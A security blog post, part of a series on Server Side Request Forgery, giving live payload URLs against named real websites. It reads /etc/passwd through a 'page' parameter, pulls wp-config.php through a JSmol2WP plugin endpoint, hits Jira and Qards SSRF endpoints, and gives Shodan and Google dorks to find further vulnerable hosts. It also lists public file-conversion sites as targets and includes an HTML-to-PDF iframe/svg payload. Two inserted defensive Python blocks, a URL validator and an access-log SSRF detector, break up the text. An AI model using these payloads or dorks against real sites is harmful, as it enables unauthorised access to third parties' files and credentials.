SSRF — Server Side Request Forgery (Types and ways to exploit it) Part-3
Let's get into live examples.
The author of this blog is in no way responsible for any misuse of the information.
4. Live Examples -
Let's look into basic SSRF.
https://robert-brook.com/parliament/index.php?page=http://www.parliament.uk/business/news/2019/parliamentary-news-2019/this-week-in-the-commons-friday-25-january-2019/
Here the page parameter fetches an external resource and displays its content.
SSRF to XSS -
https://robert-brook.com/parliament/index.php?page=http://brutelogic.com.br/poc.svg
Read Local files -
https://robert-brook.com/parliament/index.php?page=file:///etc/passwd
Trying other URL schemes, like dict://, gives an error:
Warning: file_get_contents(): Unable to find the wrapper "dict" - did you forget to enable it when you configured PHP
This indicates that the dict:// URL scheme is not enabled.
In the same way you can try other URL schemes, find which ones are enabled, and use them to exploit it further.
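As an added defensive example (not code from this post): a Python check for a fetch-by-URL parameter like page= above. It allows only http(s), so file://, dict:// and php:// wrappers are refused, resolves the host and rejects loopback, private and link-local destinations (169.254.169.254 is the cloud metadata address that appears later in this post), and optionally enforces a host allowlist. The resolver parameter and the sample address in the demo are assumptions so that it runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}   # refuses file://, dict://, php:// wrappers

def resolve(host):
    """Default resolver: every A/AAAA address the name currently maps to."""
    return {info[4][0].split("%")[0] for info in socket.getaddrinfo(host, None)}

def blocked(ip):
    """Destinations a fetch-by-URL feature must never reach: loopback, RFC 1918,
    link-local (169.254.169.254 is the cloud metadata service), multicast, reserved."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)

def check_fetch_url(url, allowed_hosts=None, resolver=resolve):
    """Return (ok, reason). Scheme must be http(s); the host must be on the
    allowlist when one is given; every address it resolves to must be public,
    which also catches DNS rebinding and odd IP literals the resolver decodes."""
    parsed = urlparse(url)
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parsed.scheme!r} not allowed"
    host = parsed.hostname
    if not host:
        return False, "missing host"
    if parsed.username is not None or parsed.password is not None:
        return False, "userinfo in URL"
    if allowed_hosts is not None and host.lower() not in allowed_hosts:
        return False, f"host {host!r} not on allowlist"
    try:
        addrs = {str(ipaddress.ip_address(host))}   # plain IP literal: no DNS needed
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError as exc:
            return False, f"cannot resolve {host!r}: {exc}"
    for addr in addrs:
        if blocked(ipaddress.ip_address(addr)):
            return False, f"{host!r} resolves to blocked address {addr}"
    return True, "ok"

if __name__ == "__main__":
    # URLs from this post; a fake resolver (constructed address) keeps the demo offline
    fake = lambda h: {"93.184.216.34"}
    for u in ("http://www.parliament.uk/business/news/", "file:///etc/passwd",
              "dict://localhost:11211/stats", "http://169.254.169.254/latest/meta-data"):
        print(u, check_fetch_url(u, resolver=fake))
```

Fetch with redirects disabled and run the same check on every Location header before following it, because a redirect from an approved host otherwise reopens the hole.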
SSRF in FFMPEG -
Read local files
Working vulnerable sites -
https://www.onlinevideoconverter.com/
https://www.files-conversion.com/
Repo Link - https://github.com/neex/ffmpeg-avi-m3u-xbin
SSRF in Widely used Plugins and CMS -
SSRF in Jira -
Jira versions < 7.3.5 suffer from SSRF:
https://<JIRA_BASEPATH>/plugins/servlet/oauth/users/icon-uri?consumerUri=…
There are more than 40k Jira sites on Shodan. You can find them using the dorks below:
X-AUSERNAME: anonymous
X-AUSERNAME: anonymous org:"Amazon.com" -- for AWS
X-AUSERNAME: anonymous org:"Microsoft Azure" -- for Azure
X-AUSERNAME: anonymous org:"google" -- for Google
Now let's see some vulnerable sites.
These are some vulnerable sites I found.
SSRF in JSmol2WP Wordpress Plugin -
JSmol2WP versions below 1.07 have an unauthenticated Server Side Request Forgery:
http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php
Dork -
inurl:wp-content/plugins/jsmol2wp
Vulnerable sites -
SSRF in Qards Wordpress Plugin -
Qards is vulnerable to Server Side Request Forgery (SSRF):
http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
Dork -
inurl:wp-content/plugins/qards
Vulnerable sites -
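Added detection example, not code from this post: a small scanner over web-server access logs for the three endpoints above (Jira icon-uri, JSmol2WP jsmol.php, Qards html2canvasproxy.php) that flags an outbound-URL parameter using a non-HTTP scheme or pointing at an internal or metadata address. The log lines are constructed, and the log format and internal-name list are assumptions.

```python
import ipaddress
import re
from urllib.parse import parse_qs, unquote, urlparse

# Endpoint -> parameter carrying the outbound URL, for the products in this post.
WATCHED = {
    "/plugins/servlet/oauth/users/icon-uri": "consumerUri",        # Jira
    "/wp-content/plugins/jsmol2wp/php/jsmol.php": "query",          # JSmol2WP
    "/wp-content/plugins/qards/html2canvasproxy.php": "url",        # Qards
}
INTERNAL_NAMES = {"localhost", "metadata.google.internal"}
# Common/combined log format: client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) \S+" \d{3}')

def classify(target):
    """Finding for one request target, or None when it is not a watched endpoint
    or the outbound URL is an ordinary http(s) fetch of a public host."""
    req = urlparse(target)
    for path, param in WATCHED.items():
        if not req.path.endswith(path):
            continue
        values = parse_qs(req.query).get(param)
        if not values:
            return None
        dest = urlparse(unquote(values[0]))     # extra decode catches double-encoding
        if dest.scheme.lower() not in ("http", "https"):
            return f"{path}: non-http scheme {dest.scheme!r}"
        host = (dest.hostname or "").lower()
        try:
            internal = not ipaddress.ip_address(host).is_global   # IP literal
        except ValueError:
            internal = host in INTERNAL_NAMES                      # DNS name
        return f"{path}: internal destination {host}" if internal else None
    return None

def scan(lines):
    """Run classify() over access-log lines; returns [(client, finding), ...]."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (finding := classify(m["target"])):
            findings.append((m["client"], finding))
    return findings

# Constructed sample log: the first two requests should alert, the last two not.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Jan/2019:10:00:01 +0000] "GET /jira/plugins/servlet/oauth/users/icon-uri?consumerUri=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data HTTP/1.1" 200 512',
    '10.0.0.5 - - [25/Jan/2019:10:00:02 +0000] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php%3A%2F%2Ffilter%2Fresource%3D..%2F..%2Fwp-config.php HTTP/1.1" 200 1201',
    '192.0.2.7 - - [25/Jan/2019:10:00:03 +0000] "GET /wp-content/plugins/qards/html2canvasproxy.php?url=http%3A%2F%2Fgoogle.com HTTP/1.1" 200 300',
    '192.0.2.7 - - [25/Jan/2019:10:00:04 +0000] "GET /index.php?page=about HTTP/1.1" 200 88',
]
```

Run scan(SAMPLE_LOG) to list the flagged requests; in practice feed it the access log of any host running one of these products, since the vulnerable endpoints are reachable unauthenticated.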
SSRF in HTML to PDF conversion -
Vulnerable sites -
https://pdfcrowd.com/#convert_by_input
https://convertio.co/html-pdf/
Content of Ssrf.html:
"><iframe src="file:///etc/passwd"></iframe>"><svg/onload=document.write(document.location)> -- to learn the path and sometimes which OS they are running on the backend
All the sites posted above are just to let you practice; I am not responsible for any misuse of the information.